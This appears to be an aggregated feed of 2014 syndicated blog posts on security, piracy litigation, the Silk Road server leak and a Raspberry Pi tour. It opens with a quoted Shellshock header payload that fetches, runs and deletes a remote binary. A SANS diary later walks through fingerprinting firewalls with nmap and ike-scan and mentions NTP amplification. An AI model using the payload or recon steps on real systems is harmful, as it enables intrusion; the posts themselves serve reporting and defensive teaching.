User-Agent: () { :;}; /bin/bash -c “wget -O /var/tmp/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*



Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Gottfrid Svartholm Trial: IT Experts Give Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice continued this week in Copenhagen, Denmark. While Gottfrid is well known as a founder of The Pirate Bay, his co-defendant’s identity is still being kept out of the media.

In what’s being described as the largest case of its kind ever seen in the Scandinavian country, both stand accused of hacking computer mainframes operated by US IT giant CSC. This week various IT experts have been taking the stand.

On Tuesday, IT investigator Flemming Grønnemose appeared for the third time and stated that during the summer and fall of 2012, Swedish police had tipped off Danish police about possible hacker attacks against CSC.

According to, as part of Grønnemose’s questioning Gottfrid’s lawyer Luise Høj raised concerns over a number of changes that had taken place on her client’s computer since it had been taken into police custody.

Grønnemose admitted that when police installed programs of their own onto the device, security holes which could have been exploited for remote control access could have been closed. However, it appears police also have an exact copy of the machine in an unmodified state.

Further evidence centered around the IP addresses that were traced during the attacks. IP addresses from several countries were utilized by the attackers including those in Cambodia, Germany, Iran, Spain and the United States. German police apparently investigated the local IP address and found that it belonged to a hacked server in a hosting facility.

The server had not been rented out for long, but was still on and had been taken over by hackers, Grønnemose said. According to the prosecution, the same server also featured in last year’s Logica case in Sweden. Gottfrid was found guilty in that case and sentenced to two years in jail.

Another IT expert called to give evidence on the same day was Allan Lund Hansen who had examined the files found on Gottfrid’s computer. Those files, garnered from the CSC hack, contained thousands of names, addresses and social security numbers of Danish citizens. Since the files were in an encrypted folder along with data from earlier attacks on IT company Logica and the Nordea bank, the prosecution are linking the files to Gottfrid.

On Thursday, reported that the debate over Gottfrid's computer being remotely controlled continued. Previously Jacob Appelbaum argued that an outside attacker could have used the machine to carry out the attacks but defense experts from the Center for Cyber Security disputed that.

This week Thomas Krismar from the Center said that Python scripts found on Gottfrid’s computer were able to carry out automated tasks but in this case remote control was unlikely to be one of them.

“There are two characteristics we always look for when we try to discover remote control features. The first is one that starts automatically when you turn on your computer since the attacker will always try to maintain their footing on the computer. The second is one that ‘phones home’ to indicate that it is ready to receive commands,” Krismar said.

The script in question on Gottfrid’s machine needed to be started manually and did not attempt to make contact with anything on the web, the expert said.

Also appearing Thursday were further witnesses including Joachim Persson of Stockholm police who investigated Gottfrid’s computers after his arrest in Cambodia.

Persson said he found a tool known as Hercules, a sophisticated piece of software that emulates the kind of systems that were hacked at CSC. Persson did note, however, that such tools have legitimate uses for those learning how to operate similar systems.

The trial continues.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Works Like a Charm

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As a software developer, one of my core philosophies is to automate common tasks. If you have to do something more than once, then it is better to automate it.

Of course, there always is that trade-off between the time to automate and the time saved. If a two-minute task takes 20 hours to automate, then it’s probably faster (and a better use of your time) to do it manually when needed. However, if you need to do it hundreds of times, then it’s better to spend 20 hours automating it.

Sometimes you may not even realize how often you do a task. All of those minutes may not seem like much, but they can really add up.

Work Harder, Not Smarter

FotoForensics is currently receiving over 1,000 unique pictures per day. We’re at the point where we can either (A) hire more administrators, or (B) simplify existing administrative duties.

Recently I've been taking a closer look at some of the tasks we manually perform. Things like categorizing content for various research projects, identifying trends, scanning content for "new" features that run the gamut from new devices to new attacks, reviewing flagged content, and responding to user requests. A lot of these tasks are time consuming and performed more than once. And a few of them can be automated.

Network abuses come in many different forms. Users may upload prohibited content, automate submissions, attack the site with port scans and vulnerability tests, or submit comment-spam to our contact form. It's always a good idea to check abusers against known blacklists. This tells me whether it is a widespread abuse or if my site is just special.

There are a bunch of servers that run DNS-based blacklists. They all work in similar ways:

  1. You encode the query as a hostname. Like “”. This encodes the IP address in reverse-notation:
  2. You perform a DNS hostname lookup.
  3. The DNS result encodes the response as an IP address. Different DNSBL servers have different encoded values, but they typically report suspicious behavior, known proxies, and spammers.

Some DNSBL servers seem too focused for my use. For example, if they only report known-spam systems and not proxies or malware, then I will rarely find a match for my non-spam queries. Other DNSBL systems seem to have dated content, with lists of proxies that have not been active for years. (One system will quickly add proxies but won't remove them without a request. So dead proxies remain listed indefinitely.)

Most DNSBL servers focus on anti-spam. They report whether the address was used to send spam, harvest addresses, or other related actions. Ideally, I’d like a DNSBL that focuses on other hostile activities: network scanners, attackers, and proxies. But for now, looking for other abuses, like harvesters and comment-spam, is good enough.

Anonymous Proxies
I believe that anonymous proxies are important. They permit whistle-blowers to make anonymous reports and allow people to discuss personal issues without the fear of direct retribution. Groups like “Alcoholics Anonymous” would not be as successful if members had to be fully outed.

Unfortunately, anonymity also permits abuses. The new automated system downloads the list of TOR nodes daily. This allows us to easily check if a ban is tied to a TOR node. We don’t ban every TOR node. Instead, we only ban the nodes used for uploading prohibited content to the site.

For beginner TOR users, this may not make sense. Banning one node won’t stop the problem since the user will just change nodes. Except… Not all TOR nodes are equal. Nodes that can handle a higher load are given a higher weight and are more likely to carry traffic. We’ve only banned about 300 of the 6,100 TOR nodes, but that seems to have stopped most abuses from TOR. (And best yet: only about a dozen of these bans were manually performed — most were caught by our auto-ban system.)

Automating History
The newly automated system also scans the logs for our own ban records and any actions made after being banned. I can tell if the network address is associated with network attacks or if the user just uploaded prohibited content. I can also tell if the user attempted to avoid the ban.

I recently had one person request a ban-removal. He claimed that he didn’t know why he was banned. After looking at the automated history report, I decided to leave the ban in place and not respond to him. But I was very tempted to write something like: “Dude… You were banned three seconds after you uploaded that picture. You saw the ban message that said to read the FAQ, and you read it twelve seconds later. Then you reloaded eight times, switched browsers, switched computers, and then tried to avoid the ban by changing your network address. And now you’re claiming that you don’t know why you were banned? Yeah, you’re still banned.”

Performing a full history search through the logs for information related to a ban used to take minutes. Now it takes one click.

NCMEC Reports
The word forensics means “relating to the use of scientific knowledge or methods in solving crimes” or “relating to, used in, or suitable to a court of law”. When you see a forensic system, you know it is geared toward crime detection and legal issues.

And people who deal in child exploitation photos know that their photos are illegal. Yet, some people are stupid enough to upload illegal pictures to FotoForensics.

The laws regarding these pictures are very explicit: we must report pictures related to child abuse and exploitation to the CyberTipline at the National Center for Missing and Exploited Children (NCMEC).

While I don’t mind the reporting requirement, I don’t like the report form. The current online form has dozens of fields and takes me more than 6 minutes to complete each time I need to submit a report. I need to gather the picture(s), information about the submitter, and other related log information. Some reports have a lot of files to attach, so they can take 12 minutes or more to complete. The total time I’ve spent using this form in the last year can be measured in days.

I’ve finally had enough of the manual submission process. I just spent a few days automating it from my side. It’s a PHP script that automatically logs in (for the session tokens), grabs the form (for the fields and any pre-populated values), fills out the data, attaches files, and submits it. It also automatically writes a short report (that I can edit with more information), records the confirmation information, and archives the stuff I am legally required to retain.
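The fragile part of that kind of automation is usually carrying the session tokens and pre-populated values forward into the submission. A minimal sketch of that step (the field name and HTML below are hypothetical; the actual CyberTipline form differs):

```python
import re

def extract_hidden_fields(html):
    """Pull hidden-input name/value pairs (e.g. a session token) out of a form page."""
    pattern = re.compile(
        r'<input[^>]*type="hidden"[^>]*name="([^"]+)"[^>]*value="([^"]*)"')
    return dict(pattern.findall(html))

# Hypothetical form snippet
page = '<form><input type="hidden" name="session_token" value="abc123"></form>'
fields = extract_hidden_fields(page)
print(fields["session_token"])  # → abc123
```

The rest of such a script is plumbing: merge these fields with the report data, attach files, POST, and archive the confirmation.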

Instead of taking me 6+ minutes for each report, it now takes about 3 seconds. This simplifies the entire reporting process and significantly reduces the ick-factor.

Will Work for Work

A week of programming effort (spread over three weeks) has allowed me to reduce the overhead. Administrative tasks that would take a few hours each day now take minutes.

There's still a good number of tasks that can be automated. This includes spotting certain types of pictures that are currently being included in specific research projects, and some automated classification. I can probably add a little more automated NCMEC reporting, for those common cases where there is no need for manual confirmation.

Eventually I will need to get a more powerful server and maybe bring on more help. But for right now, simply automating common tasks makes the current server very manageable.

SANS Internet Storm Center, InfoCON: green: Strange ICMP traffic seen in destination, (Sat, Sep 20th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Reader Ronnie provided us today a packet capture with a very interesting situation:

  1. Several packets are arriving, all ICMP echo requests from unrelated addresses:
    ICMP sources
  2. None of the ICMP packets sent to the destination address carry any data, leaving each packet at 20 bytes for the IP header plus 8 bytes for the ICMP echo request header:
    ICMP data
  3. Each unrelated address sent 6 packets: one with a normal TTL and 5 with incrementing TTLs:
    6 ICMP packets for each destination
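A data-less echo request really is the minimum possible: just the 8-byte ICMP header, plus the 20-byte IP header on the wire. A sketch of building one with a valid checksum (the identifier and sequence values here are arbitrary):

```python
import struct

def icmp_checksum(data):
    """Internet checksum: one's-complement sum of 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return ~total & 0xFFFF

def build_echo_request(ident=0x1234, seq=1):
    # type=8 (echo request), code=0, checksum placeholder, id, seq -- no payload
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = icmp_checksum(header)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq)

pkt = build_echo_request()
print(len(pkt))  # → 8 bytes; with the 20-byte IP header, the 28 bytes seen here
```

Sending these with incrementing IP TTLs is exactly a traceroute; what is unusual in the capture is many unrelated sources doing it toward one target.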

These packets seem to be trying to map a route, but in a very particular way. Since many unrelated IP addresses are attempting the same thing, something may be mapping routes to a specific address in order to do something not good. The destination IP address is an ADSL client.

Is anyone else seeing this kind of packet? If you do, we definitely want to hear from you. Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Expendables 3 Downloaders Told To Pay Up – Or Else

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Back in July a pretty much pristine copy of The Expendables 3 leaked online. It was a dramatic event for those behind the production as the movie's premiere on BitTorrent networks trumped its theatrical debut by several weeks.

Distributor Lionsgate was quick to react. Just days after the leak the entertainment company sued several file-sharing sites, which eventually resulted in the closure of file-hosting site Hulkfile. But more action was yet to come.

Doubling up on their efforts, Lionsgate also targeted hosting providers, domain registrars and seedboxes while at the same time sending thousands of DMCA takedown notices to have content and links to content removed.

However, a big question remained unanswered. Would the makers of The Expendables 3 start tracking down alleged file-sharers to force them into cash settlements as happened with previous iterations of the movie? It’s taken a few weeks but confirmation is now in.

Millennium Films, the production company behind The Expendables 3, is now shaking down individual Internet users they believe to have downloaded and shared the leaked movie without permission. What do they want? Hard cash, of course.

Interestingly, and at least for now, the company isn't going through the courts filing subpoenas against ISPs to obtain downloaders' personal details. In a switch of tactics the company is sending DMCA takedown notices to ISPs via CEG TEK International and requesting that the notices are forwarded to the customers in question instead. In addition to the usual cease-and-desist terminology, Millennium tacks on cash settlement demands too.

Expendables 3-notice

As can be seen in the image above, the production company is giving notice recipients until October 5, 2014 to come up with the money – or else.

“If within the prescribed time period described above you fail to (i) respond or settle, or (ii) provide by email to written evidence of your having consent or permission from Millennium Films to use the Work in connection with Peer-to-Peer networks (note that fraudulent submissions may give rise to additional liabilities), the above matter may be referred to attorneys representing the Work’s owner for legal action,” the settlement offer reads.

Of course, whether people fill in CEG TEK’s settlement form or write to them with their personal details, the end result will be the same. The company will now have the person’s identity, something they didn’t previously have since at this stage ISPs have only forwarded the notices.

While the notices are real (CEG TEK have confirmed the action) little is known about how much money Millennium/CEG TEK are demanding to make a supposed lawsuit go away. However, TorrentFreak has learned that CEG TEK are simultaneously sending out settlement demands to alleged downloaders of The Expendables 2. A copy of the settlement page demand – $300 – is shown below.


While some people will no doubt be worrying about how to deal with these demands and whether Millennium will follow through on its implied threat to sue, at least some of these notices will be falling on deaf ears. LiquidVPN, an anonymity company listed in our 2014 report, received one such notice but as a no-log provider, could not forward it to its customer.

Compare that to the despair of a user posting on KickassTorrents who got caught after relying on IP address blocking software (typos etc corrected).

“I woke up to this alongside four other notices from my ISP. I stopped downloading six days ago, but I’m receiving old notices about movies that were downloaded a month ago and I basically can’t do nothing about it since its old. I use PeerBlock and it’s a bunch of bullshit. What should I do with this October 5 deadline on a settlement? Please help!” he wrote.

Finally, as Lionsgate, Millennium Films and CEG TEK shake down sites, hosting services, domain registrars, seedbox providers and now end users, the most important questions remain unanswered.

Who – at Lionsgate, Millennium or one of its partners – had full access to a clean DVD copy of the movie? Who then put that copy in a position to be placed online? The FBI, who can crack the most complex of terrorist crimes, are reportedly involved and must've asked these questions. Yet the culprit still hasn't been found…

Could it be that studios become less cooperative when blame falls too close to home?

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Dread Pirate Sunk By Leaky CAPTCHA

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Ever since October 2013, when the FBI took down the online black market and drug bazaar known as the Silk Road, privacy activists and security experts have traded conspiracy theories about how the U.S. government managed to discover the geographic location of the Silk Road Web servers. Those systems were supposed to be obscured behind the anonymity service Tor, but as court documents released Friday explain, that wasn’t entirely true: Turns out, the login page for the Silk Road employed an anti-abuse CAPTCHA service that pulled content from the open Internet, thus leaking the site’s true location.

Tor helps users disguise their identity by bouncing their traffic between different Tor servers, and by encrypting that traffic at every hop along the way. The Silk Road, like many sites that host illicit activity, relied on a feature of Tor known as "hidden services." This feature allows anyone to offer a Web server without revealing the true Internet address to the site's users.

That is, if you do it correctly, which involves making sure you aren’t mixing content from the regular open Internet into the fabric of a site protected by Tor. But according to federal investigators,  Ross W. Ulbricht — a.k.a. the “Dread Pirate Roberts” and the 30-year-old arrested last year and charged with running the Silk Road — made this exact mistake.

As explained in the Tor how-to, in order for the Internet address of a computer to be fully hidden on Tor, the applications running on the computer must be properly configured for that purpose. Otherwise, the computer’s true Internet address may “leak” through the traffic sent from the computer.


And this is how the feds say they located the Silk Road servers:

“The IP address leak we discovered came from the Silk Road user login interface. Upon examining the individual packets of data being sent back from the website, we noticed that the headers of some of the packets reflected a certain IP address not associated with any known Tor node as the source of the packets. This IP address (the “Subject IP Address”) was the only non-Tor source IP address reflected in the traffic we examined.”

“The Subject IP Address caught our attention because, if a hidden service is properly configured to work on Tor, the source IP address of traffic sent from the hidden service should appear as the IP address of a Tor node, as opposed to the true IP address of the hidden service, which Tor is designed to conceal. When I typed the Subject IP Address into an ordinary (non-Tor) web browser, a part of the Silk Road login screen (the CAPTCHA prompt) appeared. Based on my training and experience, this indicated that the Subject IP Address was the IP address of the SR Server, and that it was ‘leaking’ from the SR Server because the computer code underlying the login interface was not properly configured at the time to work on Tor.”

For many Tor fans and advocates, The Dread Pirate Roberts’ goof will no doubt be labeled a noob mistake — and perhaps it was. But as I’ve said time and again, staying anonymous online is hard work, even for those of us who are relatively experienced at it. It’s so difficult, in fact, that even hardened cybercrooks eventually slip up in important and often fateful ways (that is, if someone or something was around at the time to keep a record of it).

A copy of the government’s declaration on how it located the Silk Road servers is here (PDF). A hat tip to Nicholas Weaver for the heads up about this filing.

A snapshot of offerings on the Silk Road.


SANS Internet Storm Center, InfoCON: green: Identifying Firewalls from the Outside-In. Or, “There’s Gold in them thar UDP ports!”, (Thu, Sep 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

In a penetration test, often the key to bypassing a security control is as simple as identifying the platform it's implemented on. In other words, it's a lot easier to get past something if you know what it is. For instance, quite often you'll be probing a set of perimeter addresses, and if there are no vulnerable hosts NAT-ed out for you, you might start feeling like you're at a dead end. Knowing what those hosts are would be really helpful right about now. So, what to do next?

Look at UDP, that’s what.  Quite often scanning the entire UDP range will simply burn hours or days with not a lot to show for it, but if you target your scans carefully, you can quite often get some good information in a hurry.

Scanning NTP is a great start.  Way too many folks don’t realize that when you make a network device (a router or switch for instance) an NTP client, quite often you also make it an NTP server as well, and NTP servers love to tell you all about themselves.  All too often that port is left open because nobody knows to block it.  
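On Cisco IOS, for example, that exposure can be reined in with NTP access groups. A minimal sketch, assuming a single trusted upstream time source – the ACL number and the 192.0.2.10 address are placeholders, not details from this diary:

```
! Permit full NTP exchanges only with the trusted upstream server.
access-list 20 permit host 192.0.2.10
ntp access-group peer 20
! Once any ntp access-group is configured, IOS drops NTP packets that
! match no group -- so arbitrary clients (and ntp-info style status
! queries) are refused.
```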

Another service that quite often bypasses all firewall ACLs is the corporate remote-access IPSEC VPN, specifically IKE/ISAKMP (udp/500).  Even if this is a branch firewall with a site-to-site VPN to head office, often IKE is misconfigured to bypass the interface ACL, or the VPN to head office is enabled with a blanket “any any” permit for IKE.

Let’s take a look at these two services – we’ll use NMAP to dig a little deeper.  First, let’s scan for those ports:

nmap -Pn -sU -p123,500 --open x.x.x.x
Starting Nmap 6.46 ( ) at 2014-08-29 12:13 Eastern Daylight Time

Nmap scan report for (x.x.x.x)
Host is up (0.070s latency).
123/udp open  ntp
500/udp open  isakmp

Nmap done: 1 IP address (1 host up) scanned in 46.69 seconds

OK, so we found open UDP ports – how does this help us?  Let’s run a second set of scans against these two ports, starting with expanding the NMAP scan to use the ntp-info script:

C: > nmap -Pn -sU -p123 --open x.x.x.x --script=ntp-info.nse

Starting Nmap 6.46 ( ) at 2014-08-29 12:37 Eastern Daylight Time

Nmap scan report for (x.x.x.x)
Host is up (0.042s latency).
123/udp open  ntp
| ntp-info:
|   receive time stamp: 2014-08-29T16:38:51
|   version: 4
|   processor: unknown
|   system: UNIX
|   leap: 0
|   stratum: 4
|   precision: -27
|   rootdelay: 43.767
|   rootdispersion: 135.150
|   peer: 37146
|   refid:
|   reftime: 0xD7AB23A5.12F4E3CA
|   poll: 10
|   clock: 0xD7AB2B15.EA066B43
|   state: 4
|   offset: 11.828
|   frequency: 53.070
|   jitter: 1.207
|   noise: 6.862
|_  stability: 0.244

Nmap done: 1 IP address (1 host up) scanned in 48.91 seconds

Oops – ntp-info not only tells us more about our host, it also discloses the NTP server that it’s syncing to – in this case check that host IP in red – that’s an internal host.  In my books, that can be rephrased as “the next target host”, or maybe if not next, at least on the list “for later”.  Interestingly, support for ntp-info requests positions this host nicely to act as an NTP reflector/amplifier, which can then be used in DDOS spoofing attacks.  The send/receive ratio is just under 1:7 (54 bytes sent, 370 received) – not great, but that’s still a 7x amplification which you can spoof.
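Those byte counts make the amplification factor easy to sanity-check; a quick sketch (the 54 and 370 figures are taken from the scan above):

```shell
# Byte counts from the ntp-info exchange described above.
sent=54
received=370
# POSIX shell has no floating-point arithmetic, so use awk for the ratio.
awk -v s="$sent" -v r="$received" \
    'BEGIN { printf "amplification: %.2fx\n", r/s }'
# prints: amplification: 6.85x  (just under 1:7)
```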

Back to the pentest – while ntp-info gives us some good info, it doesn’t specifically tell us what OS our target host is running, so let’s take a look at IKE next, with service detection enabled:

C: > nmap -Pn -sU -p500 -sV --open x.x.x.x

Starting Nmap 6.46 ( ) at 2014-08-29 13:10 Eastern Daylight Time

Nmap scan report for (x.x.x.x)
Host is up (0.010s latency).
500/udp open  isakmp
Service Info: OS: IOS 12.3/12.4; CPE: cpe:/o:cisco:ios:12.3-12.4

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 159.05 seconds

Ah – very nice!  Nmap correctly tells us that this device is a Cisco router (not an ASA or any other device).

The ike-scan utility should give us some additional IKE info, let’s try that with a few different options:

A basic verbose assessment (main mode) gives us nothing:

C: > ike-scan -v x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d68fbcc7d)

Ending ike-scan 1.9: 1 hosts scanned in 0.041 seconds (24.39 hosts/sec).  0 returned handshake; 1 returned notify

Ditto, main mode IKEv2:

C: > ike-scan -v -2 x.x.x.x
DEBUG: pkt len=296 bytes, bandwidth=56000 bps, int=46285 us
Starting ike-scan 1.9 with 1 hosts (
—     Pass 1 of 3 completed
—     Pass 2 of 3 completed
—     Pass 3 of 3 completed

Ending ike-scan 1.9: 1 hosts scanned in 2.432 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify

With just NAT-T, still nothing:

C: > ike-scan -v --nat-t x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d8198ef48)

Ending ike-scan 1.9: 1 hosts scanned in 0.038 seconds (26.32 hosts/sec).  0 returned handshake; 1 returned notify

Aggressive mode, however, is a winner-winner-chicken-dinner!

C: > ike-scan -v -A x.x.x.x
DEBUG: pkt len=356 bytes, bandwidth=56000 bps, int=54857 us
Starting ike-scan 1.9 with 1 hosts (
x.x.x.x    Aggressive Mode Handshake returned HDR=(CKY-R=ea1b111d4f1622a2)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) VID=1fdcb6004f1722a231f9e4f59b27b857 VID=09002689dfd6b712 (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=x.x.x.x) Nonce(20 bytes) Hash(20 bytes)

Ending ike-scan 1.9: 1 hosts scanned in 0.068 seconds (14.71 hosts/sec).  1 returned handshake; 0 returned notify

We see from this that the remote office router (which is what this device is) is configured for aggressive mode and XAUTH – in other words, there’s likely a userid and password along with the preshared key to authenticate the tunnel.  Note that ike-scan identifies this host as “Cisco Unity”, so while it gives us some new information, for basic device identification NMAP gave us better info in this case.
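On the defensive side, if aggressive mode isn’t actually required, newer Cisco IOS releases can refuse it outright. A sketch – treat this as an assumption to verify against your IOS version, not something from the scan above:

```
! Refuse to initiate or accept ISAKMP aggressive mode exchanges,
! closing off the handshake that leaked the details above.
crypto isakmp aggressive-mode disable
```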

What should you do to prevent scans like this and the exploits based on them?  The ACL on your perimeter interface might currently end with a “deny tcp any any log” – consider adding on “deny udp any any log”, or better yet, replace it with “deny ip any any log”.  Permit *exactly* what you need, deny everything else, and just as important – LOG everything that gets denied.  Logging most of what is permitted is also a good idea – if you’ve ever had to troubleshoot a problem or backtrack a security incident without logs, you are likely already doing this.
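Put together, a perimeter ACL along those lines might look like the following sketch – the interface name, addresses and permitted services are placeholders for whatever your site actually needs:

```
ip access-list extended PERIMETER-IN
 remark permit *exactly* the services you really offer
 permit tcp any host 192.0.2.25 eq 443
 remark IKE only from the head-office VPN peer
 permit udp host 192.0.2.10 any eq isakmp
 remark everything else: deny it and LOG it
 deny ip any any log
!
interface GigabitEthernet0/0
 ip access-group PERIMETER-IN in
```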

Adding a few honeypots into the mix is also a nice touch.  Denying ICMP will often defeat scripts or cursory scans.  Many network devices can be configured to detect scans and “shun” the scanning host – test this first though, you don’t want to block production traffic by accident with an active control like this.

Have you found something neat in what most might otherwise consider a common and relatively “secure” protocol?  Please, use our diary to share your story!

Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Raspberry Pi: Ben’s Mega USA Tour

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Last month we put out a blog post advertising that I would be doing a tour of America, with a rough initial route, and we welcomed requests for visits.


Over the next couple of weeks I was overwhelmed with visit requests – I plotted all the locations on a map and created a route aiming to reach as many as possible. This meant covering some distance in the South East before heading back up to follow the route west towards Utah. I prepared a set of slides based on my EuroPython talk, and evolved the deck each day according to the reception, as well as making alterations for the type of audience.

With launching the Education Fund, being in Berlin for a week for EuroPython followed by YRS week and a weekend in Plymouth, I’d barely had time to plan the logistics of the trip – much to the annoyance of our office manager Emma, who had to book me a one-way hire car with very specific pick-up and drop-off locations (trickier than you’d think), and an internal flight back from Salt Lake City. I packed a suitcase of t-shirts for me to wear (wardrobe by Pimoroni) and another suitcase full of 40 brand new Raspberry Pis (B+, naturally) to give away. As I departed for the airport, Emma and Dave stuck a huge Raspberry Pi sticker on my suitcase.


When checking in my suitcase the woman on the desk asked what the Raspberry was, and her colleague explained it to her! In the airport I signed in to the free wifi with one of my aliases, Edward Snowden. I started to think Phil McKracken or Mr. Spock might have been a better choice once I spotted a few security guards seemingly crowding around in my proximity…

Mon 4 – NYC, New York

I managed to board the flight without a federal investigation (although I may now be on the list, if I wasn’t already), and got chatting to the 60-year-old Texan lady I was seated with, who hadn’t heard about Raspberry Pi until she managed to land a seat next to me for 8 hours. I had her convinced before we left the ground. I don’t know how he does it, but Richard Branson makes 8 hours in a tin can in the sky feel like heaven. Virgin Atlantic is great!

Upon landing at JFK I was subjected to two hours’ queuing (it was nice of them to welcome us with traditional British pastimes), followed by a half-hour wait to get through customs. I felt I ought to declare that I was bringing forty computers in to the country (also stating they were to be given away), and was asked to explain what they were and show one to the officer, who took hold of one of the copies of Carrie Anne‘s book, Adventures in Raspberry Pi, to validate my explanation. Fortunately I was not required to participate in a pop quiz on Python indentation, GPIO, Turtle graphics and Minecraft, as he took my word for it and let me through. I was then given the chance to queue yet again – this time about 45 minutes for a taxi to Manhattan. I arrived at Sam‘s house much later than I’d anticipated, but she was there to greet me by hanging her head out the window and shouting “MORNING BEN” – an in-joke from a time we both lived in Manchester.

We ate and met my friend-from-the-internet Aidan, then went to a bar until what was 5am on my body clock. A sensible approach, I thought, was to just stay up and then get up at a normal time the next day. I awoke and saw the time was 6.00 – my jetlagged and exhausted mind decided it was more likely to be 6pm than 6am, but it was wrong. I arose and confirmed a meeting time and place for my first visit – just a few blocks away from Sam’s apartment in Manhattan.

Tue 5 – NYC, New York

I met Cameron and Jason who had set up a summer class teaching a computing course for locals aged 18-and-under for 2 weeks, delivered purely on Raspberry Pis! I chatted with them before the students arrived, and they told me about how they set up the non-profit organisation STEMLadder, and that they were letting the students take the Pis home at the end of the course. Today’s class was on using Python with Minecraft – using some material they found online, including a resource I helped put together with Carrie Anne for our resources section.

I gave an introduction about the Raspberry Pi Foundation and showed some example projects and then the kids did the Python exercises while working on their own “side projects” (building cool stuff while the course leaders weren’t looking)!


Thanks to Cameron and Jason for taking the opportunity to provide a free course for young people. A perfect example use for Raspberry Pi!

Wed 6 – Washington, DC

On Wednesday morning I collected my hire car (a mighty Nissan Altima) and set off for Washington, DC! I’ve been driving for less than a year, so getting in a big American car with the prospect of using the streets of Manhattan to warm up seemed rather daunting to me! I had a GPS device which alleviated some of my concern – and I headed South (yes, on the wrong right side of the road).


I’d arranged to meet Jackie at 18F – a digital services agency project in the US government General Services Administration. This came about when I met Matt from Twilio at EuroPython, who’d done a similar tour (over 5 months). After a 6-hour drive including horrendous traffic around Washington (during which I spotted a sign saying “NSA – next right – employees only”, making me chuckle), I arrived and entered 18F’s HQ (at 1800 F Street) where I had to go through security as it was an official government building. I was warned by Jackie by email that the people I’d be meeting would be wearing suits but I need not worry and wear what I pleased – so I proudly wore shorts and a green Raspberry Pi t-shirt. I met with some of the team and discussed some of their work. 18F was set up to replicate some of the recent initiatives of the UK government, such as open data, open source projects and use of GitHub for transparency. They also work on projects dealing with emergency situations, such as use of smartphones to direct people to sources of aid during a disaster, and using Raspberry Pis to provide an emergency communication system.

We then left 18F for the DC Python / Django District user group, where I gave a talk on interesting Python projects on Raspberry Pi. The talk was well received and I took some great questions from the audience. I stayed the night in Washington and decided to use the morning to walk round the monuments before leaving for North Carolina. I walked by the White House, the Washington Monument and the Lincoln Memorial and took some awkward selfies:


Thu 7 – Raleigh, North Carolina

I left DC and it took me 6 hours to get to North Carolina. I arrived at the University (NCSU) in Raleigh just in time for the event – Code in the Classroom - hosted at the Hunt library and organised by Elliot from Trinket. I set my laptop up while Elliot introduced the event, and began my talk. There was a good crowd of about 60 people – from around age 7 to 70!


The talk went down well, and I received many questions about teaching styles, classroom management and the future of the hardware. One older chap, who has been running a summer coding club on the Pi shouted out: “Where were you two weeks ago when I needed you!?” when I answered one of his questions, which generated laughter from the audience. I also had a teacher approach me after the talk asking if she could take a selfie with me to show her students she’d met someone from Raspberry Pi – I happily obliged and showed her some of my awkward selfies from Washington, DC. She asked if we could take an awkward one too – needless to say, I happily obliged!


Elliot had arranged a room next door to the lecture theatre with some Pis set up for kids to play on. I gave out some Pis to the kids and it was well over an hour before the last of them were dragged home by their parents. I chatted with Elliot and the others about them setting up a regular event in Raleigh – as there was obviously huge demand for Pi amongst kids and adults in the area and beyond (I’d heard someone had driven up from Florida to attend the talk!) – and so I look forward to hearing about the Raleigh Raspberry Jam soon! A few of us went out to get pizza, and we were accompanied by one of the smartest kids I’ve ever met – and among interesting and inspiring conversation, he kept asking me seemingly innocent questions like “what do you call that thing at the back of your car?” to which I’d reply with the British word he wanted me to speak! (It’s a boot.)


Here’s a video of the talk:

I thanked Elliot and departed for Greensboro, where I’d arranged to stay with my friend Rob from my university canoe club, and his wife Kendra.

Fri 8 – Charlotte, North Carolina

In the morning I left for UNC Charlotte where I spoke to embedded systems engineering students at EPIC (Energy Production Infrastructure Centre). There was a good crowd of about 60 students and a few members of staff. When I entered the room they were playing Matt Timmons-Brown’s YouTube videos – what a warm-up act!


Following the talk I chatted with students about their projects, answered some questions, deferred some technical questions to Gordon and Alex, and was taken out to a brilliant craft beer bar for a beer and burger with some of the staff.


